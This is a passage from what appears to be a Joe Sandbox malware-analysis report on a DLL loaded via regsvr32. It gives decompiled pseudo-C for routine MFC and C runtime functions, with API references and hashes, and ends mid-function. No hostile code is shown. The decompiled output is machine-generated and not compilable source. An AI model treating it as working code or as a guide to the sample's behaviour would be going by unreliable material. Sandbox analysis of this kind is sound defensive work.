                                                                        				char _v316;
                                                                        				void* __ebp;
                                                                        				signed int _t102;
                                                                        				intOrPtr _t106;
                                                                        				signed int _t108;
                                                                        				signed int _t110;
                                                                        				int* _t118;
                                                                        				signed int _t125;
                                                                        				signed int _t128;
                                                                        				signed int _t132;
                                                                        				void* _t136;
                                                                        				intOrPtr* _t138;
                                                                        				void* _t170;
                                                                        				intOrPtr* _t171;
                                                                        				void* _t173;
                                                                        				int _t175;
                                                                        				intOrPtr _t176;
                                                                        				signed int _t177;
                                                                        				intOrPtr _t180;
                                                                        				intOrPtr* _t181;
                                                                        				signed int _t182;
                                                                        				intOrPtr _t183;
                                                                        				signed char _t196;
                                                                        				signed char _t197;
                                                                        				signed int _t217;
                                                                        				intOrPtr* _t219;
                                                                        				intOrPtr* _t220;
                                                                        				void* _t223;
                                                                        				intOrPtr* _t224;
                                                                        				signed int _t226;
                                                                        				void* _t228;
                                                                        				void* _t229;
                                                                        				void* _t230;
                                                                        
                                                                        				_t223 = __esi;
                                                                        				_t181 = __ecx;
                                                                        				_t170 = __ebx;
                                                                        				_t102 =  *0x1004c470; // 0x303bb91f
                                                                        				_push(__esi);
                                                                        				_push(__edi);
                                                                        				_v8 = _t102;
                                                                        				_t219 = __ecx;
                                                                        				if(_a4 == 0 || lstrlenA(_a4) >= 0x104) {
                                                                        					L10:
                                                                        					_push(0);
                                                                        					_push(0xffffffff);
                                                                        					_push(3);
                                                                        					E10027180(_t181);
                                                                        					asm("int3");
                                                                        					E10011BF0(0x1003ab29, _t228);
                                                                        					_t230 = _t229 - 0x12c;
                                                                        					_t106 =  *0x1004c470; // 0x303bb91f
                                                                        					_push(_t170);
                                                                        					_push(_t223);
                                                                        					_t224 = _a4;
                                                                        					_push(_t219);
                                                                        					_t220 = _t181;
                                                                        					_t182 =  *(_t224 + 0xc);
                                                                        					_v20 = _t106;
                                                                        					_t171 = _t220 + 0x1c;
                                                                        					_t108 =  *( *_t171 - 0xc);
                                                                        					__eflags = _t108;
                                                                        					if(_t108 == 0) {
                                                                        						__eflags = _t182;
                                                                        						if(_t182 != 0) {
                                                                        							E10026397(_t182,  *(_t224 + 4), _t171, _t108);
                                                                        						}
                                                                        					}
                                                                        					_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t220 + 8))));
                                                                        					_t110 = 0;
                                                                        					__eflags =  *(_t183 - 0xc);
                                                                        					if( *(_t183 - 0xc) != 0) {
                                                                        						__eflags =  *(_t224 + 0xc);
                                                                        						if( *(_t224 + 0xc) != 0) {
                                                                        							_t173 = 0;
                                                                        							__eflags =  *(_t220 + 4);
                                                                        							if( *(_t220 + 4) > 0) {
                                                                        								do {
                                                                        									DeleteMenu( *( *(_t224 + 0xc) + 4),  *(_t224 + 4) + _t173, 0);
                                                                        									_t173 = _t173 + 1;
                                                                        									__eflags = _t173 -  *(_t220 + 4);
                                                                        								} while (_t173 <  *(_t220 + 4));
                                                                        							}
                                                                        							_t110 = GetCurrentDirectoryA(0x104,  &_v292);
                                                                        							__eflags = _t110;
                                                                        							if(_t110 != 0) {
                                                                        								__eflags = _t110 - 0x104;
                                                                        								if(_t110 < 0x104) {
                                                                        									_t175 = lstrlenA( &_v292);
                                                                        									 *((char*)(_t228 + _t175 - 0x120)) = 0x5c;
                                                                        									_t176 = _t175 + 1;
                                                                        									_v308 = _t176;
                                                                        									 *((char*)(_t228 + _t176 - 0x120)) = 0;
                                                                        									_v300 =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
                                                                        									_v8 = _v8 & 0x00000000;
                                                                        									_t118 = E100243B2();
                                                                        									_t216 =  *_t118;
                                                                        									_v296 =  *((intOrPtr*)( *_t118 + 0xc))() + 0x10;
                                                                        									_a4 = _a4 & 0x00000000;
                                                                        									__eflags =  *(_t220 + 4);
                                                                        									_v8 = 1;
                                                                        									if( *(_t220 + 4) > 0) {
                                                                        										while(1) {
                                                                        											_t125 =  *((intOrPtr*)( *_t220 + 8))( &_v300, _a4,  &_v292, _t176, 1);
                                                                        											__eflags = _t125;
                                                                        											if(_t125 == 0) {
                                                                        												goto L40;
                                                                        											}
                                                                        											_t177 = _v300;
                                                                        											_t128 = E100017D0( &_v296,  *((intOrPtr*)(_t177 - 0xc)) +  *((intOrPtr*)(_t177 - 0xc)));
                                                                        											while(1) {
                                                                        												_t196 =  *_t177;
                                                                        												__eflags = _t196;
                                                                        												if(_t196 == 0) {
                                                                        													break;
                                                                        												}
                                                                        												__eflags = _t196 - 0x26;
                                                                        												if(_t196 == 0x26) {
                                                                        													 *_t128 = _t196;
                                                                        													_t128 = _t128 + 1;
                                                                        													__eflags = _t128;
                                                                        												}
                                                                        												_t197 =  *_t177;
                                                                        												_t217 = _t197 & 0x000000ff;
                                                                        												__eflags =  *(_t217 + 0x10050a81) & 0x00000004;
                                                                        												if(( *(_t217 + 0x10050a81) & 0x00000004) != 0) {
                                                                        													 *_t128 = _t197;
                                                                        													_t128 = _t128 + 1;
                                                                        													_t177 = _t177 + 1;
                                                                        													__eflags = _t177;
                                                                        												}
                                                                        												 *_t128 =  *_t177;
                                                                        												_t128 = _t128 + 1;
                                                                        												_t177 = _t177 + 1;
                                                                        												__eflags = _t177;
                                                                        											}
                                                                        											 *_t128 = _t196;
                                                                        											E10006CE2(_t177,  &_v296, _t220, 0xffffffff);
                                                                        											_t132 =  *((intOrPtr*)(_t220 + 0x14)) + _a4 + 0x00000001 & 0x0000000f;
                                                                        											__eflags = _t132 - 0xa;
                                                                        											if(__eflags <= 0) {
                                                                        												if(__eflags != 0) {
                                                                        													wsprintfA( &_v32, ??, "&%d ", _t132);
                                                                        													goto L38;
                                                                        												} else {
                                                                        													lstrcpyA( &_v32, "1&0 ");
                                                                        												}
                                                                        											} else {
                                                                        												wsprintfA( &_v32, ??, "%d ", _t132);
                                                                        												L38:
                                                                        												_t230 = _t230 + 0xc;
                                                                        											}
                                                                        											_push( &_v32);
                                                                        											_t136 = E10006B11( &_v312, __eflags);
                                                                        											_push( &_v296);
                                                                        											_push(_t136);
                                                                        											_push( &_v316);
                                                                        											_v8 = 2;
                                                                        											_t138 = E10024DC7( &_v296, __eflags);
                                                                        											_t216 =  *(_t224 + 8);
                                                                        											_t203 =  *(_t224 + 4);
                                                                        											_t77 = _t216 + 1; // 0x1
                                                                        											 *(_t224 + 8) = _t77;
                                                                        											_t79 = _t203 + 1; // 0x3
                                                                        											_t230 = _t230 + 0xc;
                                                                        											 *(_t224 + 4) = _t79;
                                                                        											_v304 =  *_t138;
                                                                        											InsertMenuA( *( *(_t224 + 0xc) + 4),  *(_t224 + 8), 0x400,  *(_t224 + 4), _v304);
                                                                        											E100014B0(_v316 + 0xfffffff0,  *(_t224 + 8));
                                                                        											_v8 = 1;
                                                                        											E100014B0(_v312 + 0xfffffff0,  *(_t224 + 8));
                                                                        											_a4 = _a4 + 1;
                                                                        											__eflags = _a4 -  *(_t220 + 4);
                                                                        											if(_a4 <  *(_t220 + 4)) {
                                                                        												_t176 = _v308;
                                                                        												continue;
                                                                        											}
                                                                        											goto L40;
                                                                        										}
                                                                        									}
                                                                        									L40:
                                                                        									 *(_t224 + 8) =  *(_t224 + 8) - 1;
                                                                        									 *((intOrPtr*)(_t224 + 0x20)) = GetMenuItemCount( *( *(_t224 + 0xc) + 4));
                                                                        									 *((intOrPtr*)(_t224 + 0x18)) = 1;
                                                                        									E100014B0(_v296 + 0xfffffff0, _t216);
                                                                        									__eflags = _v300 + 0xfffffff0;
                                                                        									_t110 = E100014B0(_v300 + 0xfffffff0, _t216);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t180 =  *_t171;
                                                                        						__eflags =  *(_t180 - 0xc);
                                                                        						if( *(_t180 - 0xc) != 0) {
                                                                        							 *((intOrPtr*)( *_t224 + 0xc))(_t180);
                                                                        						}
                                                                        						_t110 =  *((intOrPtr*)( *_t224))(0);
                                                                        					}
                                                                        					 *[fs:0x0] = _v16;
                                                                        					return E100117AE(_t110, _v20);
                                                                        				} else {
                                                                        					_push(_a4);
                                                                        					_push( &_v268);
                                                                        					if(E1002592C(__ebx, _t219, __esi) == 0) {
                                                                        						goto L10;
                                                                        					} else {
                                                                        						_t226 = 0;
                                                                        						if( *((intOrPtr*)(_t219 + 4)) - 1 > 0) {
                                                                        							while(E1002535C(_t170, _t219, _t226,  *((intOrPtr*)( *((intOrPtr*)(_t219 + 8)) + _t226 * 4)),  &_v268) == 0) {
                                                                        								_t226 = _t226 + 1;
                                                                        								if(_t226 <  *((intOrPtr*)(_t219 + 4)) - 1) {
                                                                        									continue;
                                                                        								} else {
                                                                        								}
                                                                        								L8:
                                                                        								while(_t226 > 0) {
                                                                        									E100074A5(_t170,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4, _t228,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4 - 4);
                                                                        									_t226 = _t226 - 1;
                                                                        									__eflags = _t226;
                                                                        								}
                                                                        								goto L9;
                                                                        							}
                                                                        							goto L8;
                                                                        						}
                                                                        						L9:
                                                                        						return E100117AE(E10006AEC( *((intOrPtr*)(_t219 + 8)),  &_v268), _v8);
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000), ref: 10024FDD
                                                                        • __EH_prolog.LIBCMT ref: 1002506B
                                                                        • DeleteMenu.USER32(?,?,00000000), ref: 100250E9
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10025102
                                                                        • lstrlenA.KERNEL32(?), ref: 1002511F
                                                                        • wsprintfA.USER32 ref: 1002522E
                                                                          • Part of subcall function 1002592C: __EH_prolog.LIBCMT ref: 10025931
                                                                          • Part of subcall function 1002592C: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                          • Part of subcall function 1002592C: lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                        • lstrcpyA.KERNEL32(?,1&0 ,000000FF,?), ref: 1002521C
                                                                        • InsertMenuA.USER32(00000002,00000000,00000400,00000002,?), ref: 1002528E
                                                                        • GetMenuItemCount.USER32 ref: 100252CC
                                                                          • Part of subcall function 1002535C: lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$H_prologlstrlen$CountCurrentDeleteDirectoryFullInsertItemNamePathlstrcmpilstrcpylstrcpynwsprintf
                                                                        • String ID: %d $&%d $1&0 $\
                                                                        • API String ID: 342826643-2399880791
                                                                        • Opcode ID: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                        • Instruction ID: 8aad9e791dd0b61d4e6d294f68b120ef5cdd25e9988c916dda0b03ab33557493
                                                                        • Opcode Fuzzy Hash: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                        • Instruction Fuzzy Hash: 31B1BD34900215DFDB10CF64DC84FAAB7B4FF09345F508699E59A8B292DB31EA84CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E1001D28C(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
                                                                        				void* __ebp;
                                                                        				signed int _t31;
                                                                        				signed int _t33;
                                                                        				void* _t40;
                                                                        				int _t46;
                                                                        				intOrPtr _t64;
                                                                        				signed int* _t65;
                                                                        				void* _t67;
                                                                        				intOrPtr* _t69;
                                                                        
                                                                        				if(_a4 != 0) {
                                                                        					_push(0x100347fd);
                                                                        					_t53 = 0x1004efe8;
                                                                        					_t67 = E10037855(0x1004efe8);
                                                                        					__eflags =  *(_t67 + 0x18);
                                                                        					if( *(_t67 + 0x18) != 0) {
                                                                        						_push(_a4);
                                                                        						__eflags = E10022115();
                                                                        						if(__eflags == 0) {
                                                                        							_t53 =  *(_t67 + 0x18);
                                                                        							E10022DAA( *(_t67 + 0x18), __eflags, _a4);
                                                                        							 *(_t67 + 0x18) = 0;
                                                                        						}
                                                                        					}
                                                                        					_t64 = _a8;
                                                                        					__eflags = _t64 - 0x110;
                                                                        					if(_t64 != 0x110) {
                                                                        						__eflags = _t64 -  *0x1004f3b8; // 0x0
                                                                        						if(__eflags == 0) {
                                                                        							L22:
                                                                        							SendMessageA(_a4, 0x111, 0xe146, 0);
                                                                        							_t31 = 1;
                                                                        							__eflags = 1;
                                                                        							goto L23;
                                                                        						}
                                                                        						__eflags = _t64 - 0x111;
                                                                        						if(_t64 != 0x111) {
                                                                        							L10:
                                                                        							__eflags = _t64 - 0xc000;
                                                                        							if(_t64 >= 0xc000) {
                                                                        								_push(_a4);
                                                                        								_t69 = E10022115();
                                                                        								_t33 = E100244DE(_t69, 0x10040f58);
                                                                        								__eflags = _t33;
                                                                        								if(_t33 == 0) {
                                                                        									L14:
                                                                        									__eflags = _t64 -  *0x1004f3ac; // 0x0
                                                                        									if(__eflags != 0) {
                                                                        										__eflags = _t64 -  *0x1004f3b0; // 0x0
                                                                        										if(__eflags != 0) {
                                                                        											__eflags = _t64 -  *0x1004f3a8; // 0x0
                                                                        											if(__eflags != 0) {
                                                                        												__eflags = _t64 -  *0x1004f3b4; // 0x0
                                                                        												if(__eflags != 0) {
                                                                        													goto L11;
                                                                        												}
                                                                        												_t31 =  *((intOrPtr*)( *_t69 + 0x158))();
                                                                        												goto L23;
                                                                        											}
                                                                        											 *((intOrPtr*)( *_t69 + 0x160))(_a12, _a16 & 0x0000ffff, _a16 >> 0x10);
                                                                        											goto L11;
                                                                        										}
                                                                        										_t19 = _t69 + 0x1c0; // 0x1c0
                                                                        										_t65 = _t19;
                                                                        										 *_t65 = _a16;
                                                                        										_t31 =  *((intOrPtr*)( *_t69 + 0x15c))();
                                                                        										 *_t65 =  *_t65 & 0x00000000;
                                                                        										goto L23;
                                                                        									}
                                                                        									_t31 =  *((intOrPtr*)( *_t69 + 0x158))(_a16);
                                                                        									goto L23;
                                                                        								}
                                                                        								_t40 = E1001CE89(_t69);
                                                                        								__eflags =  *(_t40 + 0x36) & 0x00000008;
                                                                        								if(( *(_t40 + 0x36) & 0x00000008) != 0) {
                                                                        									goto L11;
                                                                        								}
                                                                        								goto L14;
                                                                        							}
                                                                        							L11:
                                                                        							_t31 = 0;
                                                                        							goto L23;
                                                                        						}
                                                                        						__eflags = _a12 - 0x40e;
                                                                        						if(_a12 == 0x40e) {
                                                                        							goto L22;
                                                                        						}
                                                                        						goto L10;
                                                                        					} else {
                                                                        						 *0x1004f3a8 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
                                                                        						 *0x1004f3ac = RegisterClipboardFormatA("commdlg_ShareViolation");
                                                                        						 *0x1004f3b0 = RegisterClipboardFormatA("commdlg_FileNameOK");
                                                                        						 *0x1004f3b4 = RegisterClipboardFormatA("commdlg_ColorOK");
                                                                        						 *0x1004f3b8 = RegisterClipboardFormatA("commdlg_help");
                                                                        						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
                                                                        						_push(_a16);
                                                                        						 *0x1004f3bc = _t46;
                                                                        						_push(_a12);
                                                                        						_t31 = E1001EB68(_t53, _a4, 0x110);
                                                                        						L23:
                                                                        						return _t31;
                                                                        					}
                                                                        				}
                                                                        				return 0;
                                                                        			}













                                                                        APIs
                                                                        • RegisterClipboardFormatA.USER32(commdlg_LBSelChangedNotify), ref: 1001D2E7
                                                                        • RegisterClipboardFormatA.USER32(commdlg_ShareViolation), ref: 1001D2F3
                                                                        • RegisterClipboardFormatA.USER32(commdlg_FileNameOK), ref: 1001D2FF
                                                                        • RegisterClipboardFormatA.USER32(commdlg_ColorOK), ref: 1001D30B
                                                                        • RegisterClipboardFormatA.USER32(commdlg_help), ref: 1001D317
                                                                        • RegisterClipboardFormatA.USER32(commdlg_SetRGBColor), ref: 1001D323
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ClipboardFormatRegister
                                                                        • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                        • API String ID: 1228543026-3888057576
                                                                        • Opcode ID: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                        • Instruction ID: 90b801e29acbd5a70dd584596d4e007027562c874008bfc0544b1ea411f40a0f
                                                                        • Opcode Fuzzy Hash: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                        • Instruction Fuzzy Hash: E7418071A00265EFDB21FF25CC889AE3BE1EB44391B12442AF905DB251DB30EA91CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E10016994() {
                                                                        				intOrPtr _t20;
                                                                        				int _t21;
                                                                        				long _t24;
                                                                        				void* _t31;
                                                                        				void* _t51;
                                                                        				long _t52;
                                                                        				void* _t57;
                                                                        				signed int _t67;
                                                                        				void** _t69;
                                                                        				void* _t70;
                                                                        				void* _t72;
                                                                        				void* _t73;
                                                                        
                                                                        				_t70 = _t72 - 0x8c;
                                                                        				_t73 = _t72 - 0x10c;
                                                                        				_t20 =  *0x1004c470; // 0x303bb91f
                                                                        				_t52 =  *(_t70 + 0x94);
                                                                        				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
                                                                        				_t21 = 0;
                                                                        				while(_t52 !=  *((intOrPtr*)(0x1004cb88 + _t21 * 8))) {
                                                                        					_t21 = _t21 + 1;
                                                                        					if(_t21 < 0x13) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				_t67 = _t21 << 3;
                                                                        				_t6 = _t67 + 0x1004cb88; // 0x28000000
                                                                        				if(_t52 ==  *_t6) {
                                                                        					_t21 =  *0x1004f3d4; // 0x0
                                                                        					if(_t21 == 1 || _t21 == 0 &&  *0x1004f3d8 == 1) {
                                                                        						_t17 = _t67 + 0x1004cb8c; // 0x10042328
                                                                        						_t69 = _t17;
                                                                        						_t24 = E10011820( *_t69);
                                                                        						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
                                                                        					} else {
                                                                        						if(_t52 != 0xfc) {
                                                                        							 *((char*)(_t70 + 0x84)) = 0;
                                                                        							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
                                                                        								E10017B90(_t70 - 0x80, "<program name unknown>");
                                                                        							}
                                                                        							_t63 = _t70 - 0x80;
                                                                        							if(E10011820(_t70 - 0x80) + 1 > 0x3c) {
                                                                        								E10019E20(E10011820(_t63) + _t70 - 0x45, "...", 3);
                                                                        								_t73 = _t73 + 0x10;
                                                                        							}
                                                                        							_t31 = E10011820(_t63);
                                                                        							_t12 = _t67 + 0x1004cb8c; // 0x10042328
                                                                        							_t14 = E10011820( *_t12) + 0x1c; // 0x1c
                                                                        							_pop(_t57);
                                                                        							E10010B20(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
                                                                        							_t51 = _t73;
                                                                        							E10017B90(_t51, "Runtime Error!\n\nProgram: ");
                                                                        							E10017BA0(_t51, _t63);
                                                                        							E10017BA0(_t51, "\n\n");
                                                                        							_t15 = _t67 + 0x1004cb8c; // 0x10042328
                                                                        							E10017BA0(_t51,  *_t15);
                                                                        							_push(0x12010);
                                                                        							_push("Microsoft Visual C++ Runtime Library");
                                                                        							_push(_t51);
                                                                        							_t21 = E10019D1D();
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E100117AE(_t21,  *((intOrPtr*)(_t70 + 0x88)));
                                                                        			}
















                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 10016A15
                                                                        • _strlen.LIBCMT ref: 10016A35
                                                                        • _strlen.LIBCMT ref: 10016A44
                                                                        • _strncpy.LIBCMT ref: 10016A5B
                                                                        • _strlen.LIBCMT ref: 10016A64
                                                                        • _strlen.LIBCMT ref: 10016A71
                                                                        • _strlen.LIBCMT ref: 10016AD7
                                                                        • GetStdHandle.KERNEL32(000000F4,10042328,00000000,?,00000000,00000000,00000000,00000000), ref: 10016AE2
                                                                        • WriteFile.KERNEL32(00000000), ref: 10016AE9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen$File$HandleModuleNameWrite_strncpy
                                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                        • API String ID: 190417973-4022980321
                                                                        • Opcode ID: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                        • Instruction ID: a98b9a16bc0a3033c6b9ef3d9cc886c10ccef6c9644ec2f046cd71b0d49ba214
                                                                        • Opcode Fuzzy Hash: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                        • Instruction Fuzzy Hash: 6331F4765002146BEB21EB74CCD6EAA37BDEF48250F10891AF545EB142EF34F9C98B64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E10015384() {
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				intOrPtr _t7;
                                                                        				struct HINSTANCE__* _t9;
                                                                        				struct HINSTANCE__* _t11;
                                                                        				long _t12;
                                                                        				_Unknown_base(*)()* _t16;
                                                                        				void* _t22;
                                                                        				struct HINSTANCE__* _t26;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t32;
                                                                        
                                                                        				if(E100138E5() != 0) {
                                                                        					_push(_t30);
                                                                        					_t26 = GetModuleHandleA("kernel32.dll");
                                                                        					__eflags = _t26;
                                                                        					if(_t26 != 0) {
                                                                        						_t30 = GetProcAddress;
                                                                        						 *0x1004f5dc = GetProcAddress(_t26, "FlsAlloc");
                                                                        						 *0x1004f5e0 = GetProcAddress(_t26, "FlsGetValue");
                                                                        						 *0x1004f5e4 = GetProcAddress(_t26, "FlsSetValue");
                                                                        						_t16 = GetProcAddress(_t26, "FlsFree");
                                                                        						__eflags =  *0x1004f5e0;
                                                                        						 *0x1004f5e8 = _t16;
                                                                        						if( *0x1004f5e0 == 0) {
                                                                        							 *0x1004f5e0 = TlsGetValue;
                                                                        							 *0x1004f5e4 = TlsSetValue;
                                                                        							 *0x1004f5dc = 0x10015164;
                                                                        							 *0x1004f5e8 = TlsFree;
                                                                        						}
                                                                        					}
                                                                        					_t7 =  *0x1004f5dc(E1001520E);
                                                                        					__eflags = _t7 - 0xffffffff;
                                                                        					 *0x1004c848 = _t7;
                                                                        					if(__eflags == 0) {
                                                                        						L9:
                                                                        						E1001516D();
                                                                        						_t9 = 0;
                                                                        						__eflags = 0;
                                                                        					} else {
                                                                        						_push(0x8c);
                                                                        						_push(1);
                                                                        						_t32 = E1001382A(_t22, 1, _t30, __eflags);
                                                                        						__eflags = _t32;
                                                                        						if(_t32 == 0) {
                                                                        							goto L9;
                                                                        						} else {
                                                                        							_t11 =  *0x1004f5e4( *0x1004c848, _t32);
                                                                        							__eflags = _t11;
                                                                        							if(_t11 == 0) {
                                                                        								goto L9;
                                                                        							} else {
                                                                        								 *((intOrPtr*)(_t32 + 0x54)) = 0x1004cb00;
                                                                        								 *((intOrPtr*)(_t32 + 0x14)) = 1;
                                                                        								_t12 = GetCurrentThreadId();
                                                                        								 *(_t32 + 4) =  *(_t32 + 4) | 0xffffffff;
                                                                        								 *_t32 = _t12;
                                                                        								_t9 = 1;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					return _t9;
                                                                        				} else {
                                                                        					E1001516D();
                                                                        					return 0;
                                                                        				}
                                                                        			}















                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,10011225,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001539C
                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 100153B4
                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 100153C1
                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 100153CE
                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 100153DB
                                                                        • FlsAlloc.KERNEL32(Function_0001520E,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015418
                                                                        • FlsSetValue.KERNEL32(00000000,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015445
                                                                        • GetCurrentThreadId.KERNEL32 ref: 10015459
                                                                          • Part of subcall function 1001516D: FlsFree.KERNEL32(FFFFFFFF,100112B4,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015178
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                        • API String ID: 2355849793-282957996
                                                                        • Opcode ID: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                        • Instruction ID: 40006df79962a22775231557979cac449e3f6d5e877b76d204bcc213d6c27e9e
                                                                        • Opcode Fuzzy Hash: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                        • Instruction Fuzzy Hash: D821CF78901A65DFE321CF7A9D88A673FE0EB42692718412EF910CF260EB71C480CF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E1002D2D6(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				int _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				intOrPtr* _v20;
                                                                        				intOrPtr _v24;
                                                                        				char _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				intOrPtr _v40;
                                                                        				intOrPtr _v44;
                                                                        				int _v48;
                                                                        				void* _v52;
                                                                        				struct tagRECT _v68;
                                                                        				struct tagRECT _v84;
                                                                        				struct tagRECT _v100;
                                                                        				struct HDWP__* _v132;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t188;
                                                                        				signed int _t190;
                                                                        				signed int _t192;
                                                                        				intOrPtr* _t198;
                                                                        				intOrPtr _t206;
                                                                        				int _t208;
                                                                        				signed int _t210;
                                                                        				signed int _t211;
                                                                        				signed int _t214;
                                                                        				signed int _t215;
                                                                        				signed int _t221;
                                                                        				void* _t225;
                                                                        				intOrPtr _t233;
                                                                        				intOrPtr _t234;
                                                                        				int _t243;
                                                                        				signed int _t251;
                                                                        				signed int _t256;
                                                                        				long _t263;
